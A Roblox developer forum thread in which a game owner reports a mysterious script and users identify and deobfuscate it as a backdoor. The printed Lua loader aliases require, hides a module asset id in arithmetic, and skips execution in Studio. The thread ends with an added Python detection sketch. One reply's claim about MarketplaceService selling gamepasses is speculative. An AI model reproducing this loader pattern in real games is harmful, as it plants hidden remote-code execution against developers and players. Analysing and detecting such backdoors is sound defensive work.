My game script got edited by another dev

So I haven’t checked my game in a while, and I decided to join the studio to make an update, and I looked in one of the scripts and I see this:

```lua
local coro = coroutine.create(ibFhs = 'Workspace' ioO1Ju = game isAKIa8Ij = 'test' iCBrOqfBhY96 = require i15np9 = 'Debris' irFwdlLU = spawn iPa3wWOs = 'GetService' iofpThquabaP8 = 'PlaceId' iUbtEO6xALZ = math.sqrt iGrU = 71758291.702703 * 37 i7MQQJ4BShx = 'RunService' i1iGZPLJzwG = 'IsStudio' iGps773kV0n = 'MarketplaceService' ivf26e1a8K = 'RunService' iTKUIea9W2S = pcall iuanRXZNNPXGsD3 = pcall iZ39cDvYfak = 'ClassName' iNnQ240LZ = 'load'  irFwdlLU(       function()        iuanRXZNNPXGsD3(       function()        if ioO1Ju:GetService(ivf26e1a8K)       [i1iGZPLJzwG]       (ioO1Ju:GetService(ivf26e1a8K)       ) then         return        end iCBrOqfBhY96(iGrU)       [iNnQ240LZ]       (ioO1Ju[iofpThquabaP8]       )        end       )        end       )
function()
```

Do any of you know what this is? Maybe a plugin did it? I really hope one of my devs didn’t post this in the game, because it would be very sad.

Spaced up a little bit so you can understand that it is indeed a backdoor.
Here’s why:

  • The code is made very confusing on purpose
  • You have “require” and an “id”, which means it is most likely a module loading up
  • For some reason, it also opens up MarketplaceService, which means he could sell any gamepasses into your game UNLESS you have this disabled (Workspace’s properties)

I’ve never seen anything like that before lol

```lua
local coro = coroutine.create(ibFhs = 'Workspace'
ioO1Ju = game
isAKIa8Ij = 'test'
iCBrOqfBhY96 = require
i15np9 = 'Debris'
irFwdlLU = spawn
iPa3wWOs = 'GetService'
iofpThquabaP8 = 'PlaceId'
iUbtEO6xALZ = math.sqrt
iGrU = 71758291.702703 * 37
i7MQQJ4BShx = 'RunService'
i1iGZPLJzwG = 'IsStudio'
iGps773kV0n = 'MarketplaceService'
ivf26e1a8K = 'RunService'
iTKUIea9W2S = pcall
iuanRXZNNPXGsD3 = pcall
iZ39cDvYfak = 'ClassName'
iNnQ240LZ = 'load'
irFwdlLU(function()iuanRXZNNPXGsD3(function()
if ioO1Ju:GetService(ivf26e1a8K)[i1iGZPLJzwG](ioO1Ju:GetService(ivf26e1a8K)) then
return
end
iCBrOqfBhY96(iGrU)[iNnQ240LZ](ioO1Ju[iofpThquabaP8])
end)
end)
function()
```

Do you think a plugin edited my scripts, or a dev of the team did?

Both options are possible. To find out, please link all the plugins you currently possess.

I have no plugins, but I can check the other devs’ plugins and see if any of them look fishy. Thanks for your help!

```lua
iCBrOqfBhY96(iGrU)[iNnQ240LZ](ioO1Ju[iofpThquabaP8])
```

means

```lua
require(2655056793)["load"](game["PlaceId"])
```

It leads to a “March 22 2019” deleted asset; it’s probably safe to assume it’s a plugin.
https://www.roblox.com/library/2655056793/Content-Deleted
As a prevention against any backdoor, all you need to do is check code that includes something such as require(id).

I recommend not having devs do it in the actual game to prevent backdoors. I always have my devs do it in another baseplate…

Please close thread.

You shouldn’t be letting developers you don’t trust as much into your game, as stated above, but also it might not end well if you accuse any of them of this and that ends up being false. I’d suggest reviewing the sources to see if it’s a plugin.

That doesn’t prevent backdoors at all. You’re just changing the place in which you’re working. The simple solution is just to check what you’re installing and verify its creator rather than taking it without a second thought.

I think the idea is that if they do their work in another place, you can kind of scan through it while you’re moving it over. As well, the main game is usually much larger and thus easier to hide a backdoor script in.

When the additional developers are only building, it makes a lot of sense to have that happening in a separate team create place from where the scripting is being done.

Free models and rogue plugins can both still be sources of backdoors. Plugins have access to more of the datamodel, and can execute code that affects your place file outside of Play runtime, so they are more dangerous overall and can hide things in your place. You have to carefully inspect every plugin you install and be very proactive in protecting your main place file against remote developers whose plugin situations you cannot control.

How did you turn that random jumble of letters into an ID?

iGrU = 71758291.702703 * 37

If you do the maths, it indirectly gives 2655056793, which means the math result is the one loading.
It’s technically not converting letters into numbers,
but iGrU defined numbers, so logically, the id.

How did you find out what iGrU is?

In the first post, you just see that iGrU is equal to numbers.

Then you look via the web with https://www.roblox.com/library/ID/Model
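
Added example, not part of the original thread: a plain text search for `require(id)` would miss the pasted script, because `require` is assigned to another variable and the id is built by arithmetic. This Python sketch follows both indirections over exported script source; the function names and the sample are constructed for illustration, and the arithmetic is the one quoted in the thread.

```python
import ast
import operator
import re

# Constructed sample: the thread's aliasing pattern and its arithmetic, plus a
# legitimate require of a ModuleScript instance and a constructed literal id.
SAMPLE = """
local Config = require(script.Parent.Config)
iA = game iB = require iC = 71758291.702703 * 37 iD = 'load'
iB(iC)[iD](iA['PlaceId'])
local m = require(123456)
"""

NUM = r"[\d.]+(?:\s*[-+*/]\s*[\d.]+)*"  # decimal constants joined by + - * /
ASSIGN = re.compile(r"\b([A-Za-z_]\w*)\s*=\s*(require\b(?!\s*[(\"'])|" + NUM + ")")
CALL = re.compile(r"\b([A-Za-z_]\w*)\s*\(\s*([A-Za-z_]\w*|" + NUM + r")\s*\)")
OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
       ast.Mult: operator.mul, ast.Div: operator.truediv}

def fold(expr):
    """Evaluate constant arithmetic without eval(); None if it is not constant."""
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in OPS:
            return OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(expr)
    try:
        return walk(ast.parse(expr, mode="eval").body)
    except (ValueError, SyntaxError, ZeroDivisionError):
        return None

def find_numeric_requires(source):
    """Ids reaching require() as a literal, via an alias, or via a computed variable."""
    aliases, numbers = {"require"}, {}
    for name, value in ASSIGN.findall(source):
        if value == "require":
            aliases.add(name)            # e.g. iB = require
        else:
            numbers[name] = fold(value)  # e.g. iC = <constant arithmetic>
    hits = []
    for func, arg in CALL.findall(source):
        if func in aliases:
            is_name = arg[0].isalpha() or arg[0] == "_"
            value = numbers.get(arg) if is_name else fold(arg)
            if value is not None:
                hits.append(round(value))
    return hits

if __name__ == "__main__":
    print(find_numeric_requires(SAMPLE))
```

It only handles decimal constants and single-step aliases, so a hit is a reason to read the script by hand, and a clean result is not proof that a script is safe.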